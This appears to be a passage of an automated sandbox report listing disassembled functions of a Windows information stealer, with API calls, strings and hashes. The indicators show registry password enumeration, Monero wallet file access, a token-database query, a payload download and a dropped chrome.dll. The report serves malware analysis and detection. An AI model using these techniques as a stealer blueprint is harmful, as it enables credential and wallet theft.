                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                  • String ID: :
                                  • API String ID: 3191641157-3653984579
                                  • Opcode ID: 209d40a2874c1dbf688f97abe9b862aea1d3ec378edff9054c4649df886174b5
                                  • Instruction ID: ee6444f2d41c01736b8427442a23dca63a31c9bd0bc1b403a7f90f37da1973b8
                                  • Opcode Fuzzy Hash: 209d40a2874c1dbf688f97abe9b862aea1d3ec378edff9054c4649df886174b5
                                  • Instruction Fuzzy Hash: 493165B1909108DBDF09EBE0DC99DFE7779AB88301B504218F116B72A2DA78AD46CB51
                                  Function 007E7330 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • memset.MSVCRT ref: 007E7374
                                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 007E739A
                                  • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 007E7411
                                  • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 007E746D
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 007E74B2
                                  • HeapFree.KERNEL32(00000000), ref: 007E74B9
                                  • task.LIBCPMTD ref: 007E75B5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$EnumFreeOpenProcessValuememsettask
                                  • String ID: Password
                                  • API String ID: 2808661185-3434357891
                                  • Opcode ID: dff33f3ae8903ef17bb409b3740c6d15a7788c4f47000cd75accf46bfbb95c88
                                  • Instruction ID: a3da531fe8766a5b6108b82a2bd7771535629f2ed546e713f0a8523021a1e771
                                  • Opcode Fuzzy Hash: dff33f3ae8903ef17bb409b3740c6d15a7788c4f47000cd75accf46bfbb95c88
                                  • Instruction Fuzzy Hash: 85612BB190519CDBDB24DB51CC45BDAB7B8BF48300F0081E9E649A6241EBB46BC9CFA1
                                  Function 007F8290 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0145D848,00000000,?,00800E14,00000000,?,00000000), ref: 007F82C0
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 007F82C7
                                  • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 007F82E8
                                  • __aulldiv.LIBCMT ref: 007F8302
                                  • __aulldiv.LIBCMT ref: 007F8310
                                  • wsprintfA.USER32 ref: 007F833C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                  • String ID: %d MB$@
                                  • API String ID: 2774356765-3474575989
                                  • Opcode ID: 71527e99e0bea5ca2ab410c9ba556aa3236336a3448d69df47921f16655faf05
                                  • Instruction ID: ede80aee0829e51a13641025626d52bd010a233eb5692df9fee3153807ede612
                                  • Opcode Fuzzy Hash: 71527e99e0bea5ca2ab410c9ba556aa3236336a3448d69df47921f16655faf05
                                  • Instruction Fuzzy Hash: DD21F7B1E44208ABDB10DFD4CC49FAEB7B9FB44B10F104619F715BB290C7B859018BA5
                                  Function 007E9E30 Relevance: 13.7, APIs: 8, Strings: 1, Instructions: 163stringsleepCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 007F8CF0: GetSystemTime.KERNEL32(00800E1B,01459D08,008005B6,?,?,007E13F9,?,0000001A,00800E1B,00000000,?,01458B80,?,\Monero\wallet.keys,00800E1A), ref: 007F8D16
                                  • wsprintfA.USER32 ref: 007E9E7F
                                  • memset.MSVCRT ref: 007E9EED
                                  • lstrcat.KERNEL32(00000000,?), ref: 007E9F03
                                  • lstrcat.KERNEL32(00000000,?), ref: 007E9F17
                                  • lstrcat.KERNEL32(00000000,008012D8), ref: 007E9F29
                                  • lstrcpy.KERNEL32(?,00000000), ref: 007E9F7C
                                  • memset.MSVCRT ref: 007E9F9C
                                  • Sleep.KERNEL32(00001388), ref: 007EA013
                                    • Part of subcall function 007F99A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 007F99C5
                                    • Part of subcall function 007F99A0: Process32First.KERNEL32(007EA056,00000128), ref: 007F99D9
                                    • Part of subcall function 007F99A0: Process32Next.KERNEL32(007EA056,00000128), ref: 007F99F2
                                    • Part of subcall function 007F99A0: OpenProcess.KERNEL32(00000001,00000000,?), ref: 007F9A4E
                                    • Part of subcall function 007F99A0: TerminateProcess.KERNEL32(00000000,00000000), ref: 007F9A6C
                                    • Part of subcall function 007F99A0: CloseHandle.KERNEL32(00000000), ref: 007F9A79
                                    • Part of subcall function 007F99A0: CloseHandle.KERNEL32(007EA056), ref: 007F9A88
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$CloseHandleProcessProcess32memset$CreateFirstNextOpenSleepSnapshotSystemTerminateTimeToolhelp32lstrcpywsprintf
                                  • String ID: D
                                  • API String ID: 3242155833-2746444292
                                  • Opcode ID: 3daa2193edbf3ee86a55427bb8b72485b46eb03f0ce6b7591dab6af77f3c85af
                                  • Instruction ID: bfcbd5dda841901f39ab43abeecc3a04450ed7cf04e4c90442609192fbbba4de
                                  • Opcode Fuzzy Hash: 3daa2193edbf3ee86a55427bb8b72485b46eb03f0ce6b7591dab6af77f3c85af
                                  • Instruction Fuzzy Hash: 7C5177B1944308ABDB24DBA0DC4AFDE7778AF44700F004598B60DAB2D1EAB59B84CF51
                                  Function 007E60F0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 007FAAB0: lstrcpy.KERNEL32(?,00000000), ref: 007FAAF6
                                    • Part of subcall function 007E4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 007E4889
                                    • Part of subcall function 007E4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 007E4899
                                  • InternetOpenA.WININET(00800DFB,00000001,00000000,00000000,00000000), ref: 007E615F
                                  • StrCmpCA.SHLWAPI(?,0145E350), ref: 007E6197
                                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 007E61DF
                                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 007E6203
                                  • InternetReadFile.WININET(?,?,00000400,?), ref: 007E622C
                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 007E625A
                                  • CloseHandle.KERNEL32(?,?,00000400), ref: 007E6299
                                  • InternetCloseHandle.WININET(?), ref: 007E62A3
                                  • InternetCloseHandle.WININET(00000000), ref: 007E62B0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2507841554-0
                                  • Opcode ID: 52780ad28c358bf15246b27bfbfbb7d96e2b6e7a875c39a5f93f6a133ba8732e
                                  • Instruction ID: 74e3ce72694301b0829cad6ac82528f0e06f13274bbefbb96a3317eebd8ad0fb
                                  • Opcode Fuzzy Hash: 52780ad28c358bf15246b27bfbfbb7d96e2b6e7a875c39a5f93f6a133ba8732e
                                  • Instruction Fuzzy Hash: F15173B1A00208ABDF20DF95DC49BEE7779BB44741F004198F705A71D1DBB86A85CF65
                                  Function 0086012E Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • type_info::operator==.LIBVCRUNTIME ref: 0086024D
                                  • ___TypeMatch.LIBVCRUNTIME ref: 0086035B
                                  • CatchIt.LIBVCRUNTIME ref: 008603AC
                                  • CallUnexpected.LIBVCRUNTIME ref: 008604C8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CallCatchMatchTypeUnexpectedtype_info::operator==
                                  • String ID: csm$csm$csm
                                  • API String ID: 2356445960-393685449
                                  • Opcode ID: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                  • Instruction ID: d73f8415b1cb14a8446f77c314e6242888f2c05df6436570acec0f22e1085d61
                                  • Opcode Fuzzy Hash: 0aa7d8e53ae69f4e65a14af659269dcd6c8d533d9c3592b436de8e99f8465a7b
                                  • Instruction Fuzzy Hash: C7B16A31800209DFCF25DFA8C8819AFBBB5FF14315F16416AEA11AB212D730DA51CF9A
                                  Function 007EBA50 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                    • Part of subcall function 007FACC0: lstrlen.KERNEL32(?,01458B80,?,\Monero\wallet.keys,00800E1A), ref: 007FACD5
                                    • Part of subcall function 007FACC0: lstrcpy.KERNEL32(00000000), ref: 007FAD14
                                    • Part of subcall function 007FACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007FAD22
                                    • Part of subcall function 007FAC30: lstrcpy.KERNEL32(00000000,?), ref: 007FAC82
                                    • Part of subcall function 007FAC30: lstrcat.KERNEL32(00000000), ref: 007FAC92
                                    • Part of subcall function 007FABB0: lstrcpy.KERNEL32(?,00800E1A), ref: 007FAC15
                                    • Part of subcall function 007FAAB0: lstrcpy.KERNEL32(?,00000000), ref: 007FAAF6
                                  • lstrlen.KERNEL32(00000000), ref: 007EBC6F
                                    • Part of subcall function 007F8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 007F8FE2
                                  • StrStrA.SHLWAPI(00000000,AccountId), ref: 007EBC9D
                                  • lstrlen.KERNEL32(00000000), ref: 007EBD75
                                  • lstrlen.KERNEL32(00000000), ref: 007EBD89
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                  • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                  • API String ID: 3073930149-1079375795
                                  • Opcode ID: f34d8ba755d3786dd949efac8e2d3df66c4ef31d861ef861c2b9e12e7d2078c4
                                  • Instruction ID: 7450a1ef6c96b66007f80c5025157e36aa6e3eb2907d76b2ddc230e1052f664e
                                  • Opcode Fuzzy Hash: f34d8ba755d3786dd949efac8e2d3df66c4ef31d861ef861c2b9e12e7d2078c4
                                  • Instruction Fuzzy Hash: 76B105B191010CEBCF14FBA4DD9ADFE7739AF54300F404559F60A622A1EF386A48CB62
                                  Function 007F6A10 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess$DefaultLangUser
                                  • String ID: *
                                  • API String ID: 1494266314-163128923
                                  • Opcode ID: 371498cf5cfd99b8daec4a6c4f7bedbbe79dc9492d72e24d3d178d04125abb75
                                  • Instruction ID: 1a40b3edc7a029ce39e18042c840daeb64e684c58853dd39571b75f64c365855
                                  • Opcode Fuzzy Hash: 371498cf5cfd99b8daec4a6c4f7bedbbe79dc9492d72e24d3d178d04125abb75
                                  • Instruction Fuzzy Hash: D4F03A30908209EFD344DFE4A8097ACBB30AB44706F1183A5E619AA2B1C6B44A519B61
                                  Function 007F08A0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 255fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 007FAA50: lstrcpy.KERNEL32(00800E1A,00000000), ref: 007FAA98
                                    • Part of subcall function 007F9850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,007F08DC,C:\ProgramData\chrome.dll), ref: 007F9871
                                    • Part of subcall function 007EA090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 007EA098
                                  • StrCmpCA.SHLWAPI(00000000,01458AB0), ref: 007F0922
                                  • StrCmpCA.SHLWAPI(00000000,01458A40), ref: 007F0B79
                                  • StrCmpCA.SHLWAPI(00000000,01458AC0), ref: 007F0A0C
                                    • Part of subcall function 007FAAB0: lstrcpy.KERNEL32(?,00000000), ref: 007FAAF6
                                  • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 007F0C35
                                  Strings
                                  • C:\ProgramData\chrome.dll, xrefs: 007F0C30
                                  • C:\ProgramData\chrome.dll, xrefs: 007F08CD
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2106338849.00000000007E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true
                                  • Associated: 00000000.00000002.2106325290.00000000007E0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000080C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000091D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000929000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.000000000094E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106338849.0000000000AB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000ACA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000C51000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D2E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106543234.0000000000D66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106831019.0000000000D67000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106944924.0000000000EFE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2106959064.0000000000EFF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7e0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$CreateDeleteLibraryLoad
                                  • String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
                                  • API String ID: 585553867-663540502
                                  • Opcode ID: f36169c2aeef5d02886e2cdd3e51bdbdd381ada3fbbe9af10124b1afcbfd898e
                                  • Instruction ID: 8588e64d2dc81a89d01006cab31cbcc8789447c68316d8cb0a984a56e9b8aa2f
                                  • Opcode Fuzzy Hash: f36169c2aeef5d02886e2cdd3e51bdbdd381ada3fbbe9af10124b1afcbfd898e
                                  • Instruction Fuzzy Hash: 3CA16571700248EFCF18EF68C996ABD7776EF94300F10816DE50A9F352DA349A09CB92
                                  Function 0085F9E8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                                  Download Yara Rule
                                  APIs
                                  • _ValidateLocalCookies.LIBCMT ref: 0085FA1F
                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 0085FA27
                                  • _ValidateLocalCookies.LIBCMT ref: 0085FAB0
                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 0085FADB
                                  • _ValidateLocalCookies.LIBCMT ref: 0085FB30
                                  Strings
                                  Memory Dump Source
